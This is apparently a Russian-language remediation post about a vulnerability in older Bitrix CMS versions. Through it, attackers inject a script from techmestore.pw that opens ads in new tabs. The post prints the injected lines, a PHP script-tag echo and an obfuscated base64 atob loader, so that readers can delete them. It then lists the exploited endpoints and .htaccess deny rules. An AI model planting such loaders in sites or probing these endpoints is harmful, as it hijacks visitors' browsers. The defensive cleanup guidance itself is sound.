Вставка кода с techmestore.pw/jquery-ui.js

В старых версиях Битрикса существует уязвимость, которая позволяет получать доступ к файлам и менять их.

Уязвимы версии <= 21.400.100, лицензии Standart <= Business.

На сайты вставляется код с techmestore.pw/jquery-ui.js, который показывает рекламу в новых вкладках.
Для его удаления надо:удалить в файле ./bitrix/modules/main/include/prolog.php строку:

echo «<script src=’https://techmestore.pw/jquery-ui.js’></script>»;

удалить в файле ./bitrix/js/main/core/core.js строку:

s=document.createElement(`script`);
s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);
document.head.appendChild(s);

Как закрыть уязвимость?

Обновить движок до последней версии
Закрыть доступ к эксплуатируемым папкам через .htaccess

Закрывать доступ надо к файлам:

/bitrix/tools/upload.php
/bitrix/tools/mail_entry.php
/bitrix/modules/main/include/virtual_file_system.php
/bitrix/components/bitrix/sender.mail.editor/ajax.php
/bitrix/tools/vote/uf.php
/bitrix/tools/html_editor_action.php
/bitrix/admin/site_checker.php

В ./bitrix/admin/.htaccess

<Files ~ «^(site_checker)\.php$>
deny from all
</Files>

В ./bitrix/tools/.htaccess

<Files ~ «^(html_editor_action|mail_entry|upload)\.php$>
deny from all
</Files>

В ./bitrix/modules/main/include/.htaccess

<Files ~ «^(virtual_file_system)\.php$>
deny from all
</Files>

Вставка кода с techmestore.pw/jquery-ui.js

Обработчик события для изменения дефолтных значений в заказе ( местоположение )

Генератор фавиконки из png + конвертер